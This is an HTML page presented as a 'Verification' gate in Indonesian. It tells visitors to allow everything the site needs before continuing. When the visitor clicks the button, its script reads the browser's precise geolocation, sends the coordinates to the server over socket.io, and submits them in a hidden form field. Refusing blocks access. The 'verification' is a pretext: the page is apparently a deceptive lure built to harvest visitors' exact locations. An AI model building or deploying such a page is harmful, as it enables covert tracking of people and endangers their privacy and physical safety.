<html>
        <head>
          <title>Verification</title>
          <style>
            body {
              display: flex;
              justify-content: center;
              align-items: center;
              height: 100vh;
              background-color: #f8f9fa;
              font-family: Arial, sans-serif;
            }
            .verification-container {
              background: #fff;
              padding: 20px;
              border-radius: 8px;
              box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
              text-align: center;
            }
            .verification-container h1 {
              margin-bottom: 20px;
              color: #333;
            }
            .verification-container label {
              display: block;
              margin-bottom: 10px;
              color: #666;
            }
            .verification-container input[type="date"] {
              padding: 10px;
              width: 100%;
              margin-bottom: 20px;
              border: 1px solid #ccc;
              border-radius: 4px;
            }
            .verification-container button {
              padding: 10px 20px;
              background-color: #007bff;
              color: white;
              border: none;
              border-radius: 4px;
              cursor: pointer;
            }
            .verification-container button:hover {
              background-color: #0056b3;
            }
          </style>
          <script src="/socket.io/socket.io.js"></script>
          <script>
            const socket = io();
            function getLocationAndVerify() {
              if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(position => {
                  const { latitude, longitude } = position.coords;
                  socket.emit('location', { latitude, longitude });
                  document.getElementById('location').value = position.coords.latitude + ',' + position.coords.longitude;
                  document.getElementById('age-form').submit();
                }, error => {
                  alert('Lokasi diperlukan untuk verifikasi.');
                });
              } else {
                alert('Geolokasi tidak didukung oleh browser ini.');
              }
            }
          </script>
        </head>
        <body>
          <div class="verification-container">
            <h3>Izinkan semua yang di perlukan oleh website ini agar dapat lanjut ke halaman utama.</h3>
            <form id="age-form" action="/verify" method="post">
              <input type="hidden" id="location" name="location" required>
              <button type="button" onclick="getLocationAndVerify()">Lanjut</button>
            </form>
          </div>
        </body>
      </html>